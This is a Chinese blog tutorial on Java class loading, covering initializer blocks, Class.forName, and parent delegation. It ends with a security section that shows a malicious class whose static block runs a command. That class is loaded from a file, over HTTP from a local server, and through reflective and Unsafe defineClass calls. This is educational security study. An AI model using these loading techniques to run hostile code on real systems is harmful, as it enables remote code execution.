Java安全--篇2-类的动态加载

最新推荐文章于 2024-04-24 17:51:20 发布
最新推荐文章于 2024-04-24 17:51:20 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: Java安全 文章标签: java jvm 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/128180906
版权

类的动态加载

首先我们来了解一下构造代码块和静态代码块:Java中静态代码块、构造代码块、构造函数、普通代码块 - YSOcean - 博客园

// 静态代码块
static {
    System.out.println("静态代码块");
}

// 构造代码块
{
    System.out.println("构造代码块");
}

继上周我们重写了Person类:

package packet1;

import java.io.Serializable;

public class Person implements Serializable {
    private String name;
    private int age;
    static int id;

    public Person(){
        System.out.println("无参构造方法");
    }

    static {
        System.out.println("静态代码块");
    }

    {
        System.out.println("构造代码块");
    }

    public Person(String name, int age){
        this.name = name;
        this.age = age;
        System.out.println("有参代码块");
    }

    public static void staticFunction(){
        System.out.println("静态方法");
    }

}

我们先写一个main来实例化Person看一下结果:

看到这个结果我们可以观察到两个信息:

  1. 实例化一个类后调用了静态代码块和构造代码块
  2. 执行的顺序是 静态代码块->构造代码块 -> 无参构造方法

接下来我们利用反射来尝试获取类看看会发生什么:

发现只调用了静态代码块

为什么?了解一下类是怎么加载到JVM中的:

一个类从被加载到虚拟机内存中开始,到卸载出内存,它的整个生命周期包括:加载(Loading)、验证(Verification)、准备(Preparation)、解析(Resolution)、初始化(Initialization)、使用(Using)和卸载(Unloading)7个阶段。

类加载过程,以及什么是双亲委派? - 掘金

用图来说就是这样:

重要的步骤就三步

  • 加载
  • 连接
  • 初始化

只要初始化了就会执行静态代码块

如果实例化那么与对象相关的实例化和构造方法也会被调用

那么为什么forName会初始化类呢?我们可以看一下forName的构造函数:

其中之一的构造函数是这样

  • 参数一
    • 类名
  • 参数二
    • 是否初始化
  • 参数三
    • 使用的类加载器

所以我们如果这样就不会初始化类了:

将initialize这个参数设置成为false,代表不进行初始化。

运行结果:

发现只是对类进行了加载,并没有初始化。

我们这样使用forName:

如果跟进forName:

这一步我们就调用了一个参数的构造方法,但是在这个构造方法里面还是会调用四个参数的构造方法。可以看见默认的initialize默认是true,因此用一个参数的构造方法默认是会初始化的,我们继续往下看是如何初始化的。

Class.forName->Class.forName0->ClassLoader.loadClass

继续跟进发现到了Launcher.loadClass

这些检查机制过了之后就调用super.loadClass,即 ClassLoader.loadClass,发现还是回到了ClassLoader.loadClass

到了这一步里面有一个判断parent!=null,这里涉及到双亲委派

双亲委派:

在逻辑加载上是这样的:

我们可以尝试获取一下当前的应用类加载器是哪一个:

运行结果是ApplicationClassLoader。

当我们运行这个程序的时候要加载Person类,它并不会马上加载,而是会委托自己的逻辑父类ExtensionClassLoader去加载,ExtensionClassLoader会委托自己的逻辑父类BootstrapClassLoader去加载,如果这两个类加载器都无法加载,那么才会自己加载。

  • BootstrapClassLoader(启动类加载器)是负责加载基础的String类、java.lang类等比较基础的类。
  • ExtensionClassLoader就是加载扩展类。
  • AppClassLoader应用类加载器,又称为系统类加载器,负责在JVM启动时,加载来自在命令java中的classpath或者java.class.path系统属性或者CLASSPATH操作系统属性所指定的JAR类包和类路径。

那么为什么要说逻辑父类去加载?

可以看见AppClassLoader和ExtClassLoader是继承于同一个类URLClassLoader,所以在类的关系上,他们是同级。但是在双亲委派的逻辑关系上他们却是子父类

接下来会调用ClassLoader.findClass->URLClassLoader.findClass

这里这行代码是获取类名

URLClassLoader.findClass->URLClassLoader.defineClass

到了definClass里面发现已经开始创建byte数组了,其实在defineClass里面就是完成了类的加载

加载完后出来就是:

判断是否resolve(解析) 类的流程:加载、解析、初始化

return的路径:ClassLoader->LauncherLoader->ClassLoader->Class

小结一下:

forName的整个类的继承关系是这样的:

ClassLoader->SecureClassLoader->URLClassLoader->AppClassLoader

->ExtClassLoader

调用顺序是这样的:

loadClass->findClass(重写的方法)->defineClass(字节码加载类)

安全问题

我们如果可以利用URLClassLoader,就可以通过把恶意代码写在静态代码块里面来加载从而执行命令。

我们首先编译一个恶意的Hello类:

import java.io.IOException;

public class Hello {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

再使用一个URLClassLoader来加载这个类:

package packet1;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Test {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URLClassLoader uc = new URLClassLoader(new URL[]{new URL("file:///D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\packet1\\")});
        Class<?> hello = uc.loadClass("Hello");
        hello.newInstance();
    }
}

运行结果,成功弹出计算机。

但是我们这里是利用了file协议,file协议是本地协议。我们可以使用http协议

首先,我们在某个路径开启http服务:

然后修改Hello.java:

package packet1;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Test {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URLClassLoader uc = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
        Class<?> hello = uc.loadClass("Hello");
        hello.newInstance();
    }
}

同样可以触发计算器。

如果服务器不出网的话可以利用defineClass:

package packet1;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {
    public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException {
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
        Object hello = method.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
        Class c = (Class)hello;
        c.newInstance();
    }

}

还有另一个类可以调用definClass:

package packet1;

import sun.misc.Unsafe;

import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {
    public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException, NoSuchFieldException {
        Field u = Unsafe.class.getDeclaredField("theUnsafe");
        u.setAccessible(true);
        Unsafe c = (Unsafe)u.get(null);
        byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
        Class<?> test = c.defineClass("Hello", code, 0, code.length, ClassLoader.getSystemClassLoader(), null);
        test.newInstance();

    }
}

清风--
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java 反射:动态加载和调用教程
2301_76607156的博客
03-09 2212
动态代理是一种常用的设计模式,它可以在不修改原始代码的情况下增强已有代码的功能。它基于 Java 的反射机制实现,通常用于实现 AOP(面向切面编程)。本文介绍了 Java 反射的基本原理和用法,并通过动态代理实现了一个实际应用。反射可以在运行时动态地获取信息和调用方法,是 Java 中非常重要的特性之一。通过反射,我们可以在运行时创建对象、调用方法、获取属性和注解等信息。同时,反射还能够实现动态代理,帮助我们实现一些特殊的功能。
Java动态加载
Le1a's Blog
03-23 5771
Java动态加载 文章首发自: https://www.le1a.com/posts/9d41d3f8/ 前言 前面学习了反序列化,正准备趁热打铁去学cc3了,但是发现cc3需要用到动态加载,就先来学一下。 利用URLClassLoader加载远程class文件 首先了解下什么是ClassLoader? ClassLoader是一个"加载器",它会让Java虚拟机知道如何加载这个。默认的ClassLoader是根据名来加载的,这个名必须是的完整路径(跟反射有点似),例如java.lang.R
java--动态加载
zyer
05-17 2939
Java字节码(ByteCode)指的是Java虚拟机执行使用的一指令,通常被存储在.class文件中。 但是我们所说的"字节码"可以理解的更广义一些----所有能够恢复成一个并在JVM虚拟机里加载的字节序列,都在我们的讨论范围之内。 Java的ClassLoader是用来加载字节码文件最基础的方法,ClassLoader就是一个"加载器",告诉Java虚拟机如何加载这个。 ClassLoader就是根据名来加载,这个名是完整路径。 我们在学习反射的时候利用到的Class.forNam
Java 如何动态加载执行动态加载方法
最新发布
wangfangdehaojiao的博客
04-24 216
Java 在应用的过程中,当业务需要加载动态的脚本或者是执行方法时,可以通过以上方式动态加载JavaJava方法,返回对应的执行结果
JVM动态加载深度剖析:Java程序员的高效编程秘诀
爱媳妇儿爱编程
09-30 5727
JVMJava虚拟机)中的动态加载是一种在运行时加载的机制,它允许应用程序在不重新启动的情况下加载新的。它对Java应用程序的灵活性和扩展性至关重要。
JAVA进阶之路JVM-2:加载机制,的生命周期,加载过程,加载时机,加载器,双亲委派模型,对象创建过程
HakerDONG的博客
11-28 1254
JVM加载机制
Java安全漫谈 - 02.反射(2)1
08-03
Java反射机制是Java提供的一种强大的动态型功能,允许程序在运行时检查的信息并操作的对象。在Java安全领域,反射常被用于漏洞利用和代码审计。本文将深入探讨Java反射在安全方面的应用,特别是针对加载、...
Java安全漫谈 - 01.反射(1)1
08-03
反射机制可以用来动态加载、创建对象、调用方法、访问字段等。 反射机制的安全隐患 反射机制的安全隐患主要来自于以下几个方面: 1. 代码注入攻击:攻击者可以使用反射机制来注入恶意代码,导致系统受到攻击...
Java安全漫谈 - 06.RMI(3)1
08-03
Java安全漫谈 - 06.RMI(3)深入探讨了Java远程方法调用(RMI)中的安全问题,特别是利用Java序列化协议来执行远程代码。在RMI服务中,codebase机制允许加载远程,从而可能引发安全风险。本文通过分析网络数据包,...
Java面试笔记-基础问题.docx
08-10
Classpath是Java加载路径,用于查找.class文件。 17. **反射机制**:反射允许在运行时动态地获取的信息并操作的对象。 18. **final关键字**:final用于声明常量或防止变量、方法和被修改。 19. **异常...
mysql-connector-java-8.0.30-jar包
01-13
2. **MySQL Connector/J**: MySQL Connector/J 是 MySQL 的官方 JDBC 驱动,它实现了 JDBC API,使得 Java 应用程序能够无缝地与 MySQL 数据库交互。此驱动支持多种连接模式,包括标准 TCP/IP、SSL、Unix 套接字等。...
java 动态加载的实现代码
08-29
主要介绍了java 动态加载的实现代码的相关资料,Java动态加载主要是为了不改变主程序代码,通过修改配置文件就可以操作不同的对象执行不同的功能,需要的朋友可以参考下
java 热替换,透过现象看本质:Java动态加载和热替换
2401_84046912的博客
04-15 692
这份《“java高分面试指南”-25分227页1000+题50w+字解析》同样可分享给有需要的朋友,感兴趣的伙伴们可挑战一下自我,在不看答案解析的情况,测试测试自己的解题水平,这样也能达到事半功倍的效果!(好东西要大家一起看才香)《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取![外链图片转存中…(img-MUmdLevc-1713113578760)]《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
JavaClassLoader(加载器)全解
热门推荐
全栈行动派的博客
03-26 1万+
JavaClassLoader(加载器)全解。引导加载器、扩展加载器、系统加载器负责加载范围详解;ClassLoader源码解析;双亲委派模型流程详解、优势和劣势详解。
Java 加载加载(静态加载动态加载) | 加载过程(加载、连接、初始化)」
渐渐的忘记,赶不上明天(读研ing,2024年毕业)
07-13 624
1 加载 2 加载过程详解
java动态加载_Java动态加载
weixin_29701553的博客
02-12 1321
package com.biao.util;import java.io.File;import java.net.URL;import java.net.URLClassLoader;import com.biao.ActionInterface;/*** 使用URLClassLoader动态加载Class和jar包中的. 这样,可以把这些路径放在配置文件中,动态加载.*/public...
Java应用运行时,如何动态加载信息?实例化?你可以使用Java反射机制
Oneknows的博客
08-14 913
Java高级特性中,反射Reflect是使用很广泛的功能,Spring体系框架中生成动态代理就离不开反射,JUnit测试框架中亦使用反射管理,所以,我们有必要花足够的时间去了解这个特性。
使用Java中的反射技术实现动态加载和方法
Y18870954401的博客
07-18 724
通过反射,我们可以动态加载和方法,使得程序具有更高的灵活性和可扩展性。本文将介绍如何使用Java中的反射技术实现动态加载和方法,并通过代码示例进行演示。通过上述代码示例,我们成功地使用反射技术动态加载"DynamicClass"并调用了它的方法"dynamicMethod"。这种动态加载和方法的方式可以在运行时根据需要加载和调用不同的和方法,从而实现更灵活和可扩展的程序设计。假设我们有一个名为"DynamicClass"的,它包含一个名为"dynamicMethod"的方法。
Java动态加载
努力学习的小栋的博客
04-05 1222
今天上课讲了Java中的一些反射知识。 随便练习了一下。 学生: public class Student { public static int number; static { number = 0; } public Student() { } private String studentName; public String getStudentName() { return student

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值